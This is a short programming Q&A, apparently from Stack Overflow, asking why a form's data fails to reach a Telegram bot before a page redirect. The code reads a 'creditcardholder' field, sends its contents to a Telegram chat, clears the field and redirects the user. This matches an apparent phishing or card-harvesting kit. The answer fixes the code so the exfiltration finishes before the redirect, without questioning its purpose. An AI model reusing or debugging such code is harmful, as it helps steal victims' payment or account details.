# How to redirect to another page via javascript and telegram bot api

Tags: javascript

I have problems redirecting the user to the next page. What happens is that after sending the form, the user is directed to the next page but does not connect me the message by Bot Telegram.

```
var telegram_bot_id = "token";
var chat_id = "id";
var email;
var ready = function () {
    
    email = document.getElementById("creditcardholder").value;
    
    message = "Email: " + email ;
};
var sender = function () {
    ready();
    var settings = {
        "async": true,
        "crossDomain": true,
        "url": "https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json",
            "cache-control": "no-cache"
        },
        "data": JSON.stringify({
            "chat_id": chat_id,
            "text": message
        })
    };
    $.ajax(settings).done(function (response) {
        console.log(response);
    });
    
    document.getElementById("creditcardholder").value = "";
    
    window.location.href = "main2.html";
    
    return false;
    
};
```

Comment: Try to redirect the user after the successful completion of the telegram request. Now your request is interrupted because the user is redirected to another page.

Answer (score 0):

If you redirect the user before completing the AJAX request, the AJAX request will be aborted. In this modified code, the redirect occurs only after the successful completion of the AJAX request:

```js
var telegram_bot_id = "token";
var chat_id = "id";
var email;
var ready = function () {
    
    email = document.getElementById("creditcardholder").value;
    
    message = "Email: " + email ;
};
var sender = function () {
    ready();
    var settings = {
        "async": true,
        "crossDomain": true,
        "url": "https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json",
            "cache-control": "no-cache"
        },
        "data": JSON.stringify({
            "chat_id": chat_id,
            "text": message
        })
    };
    $.ajax(settings).done(function (response) {
        console.log(response);
    
        window.location.href = "main2.html";
    });
    
    document.getElementById("creditcardholder").value = "";
    
    return false;
    
};
```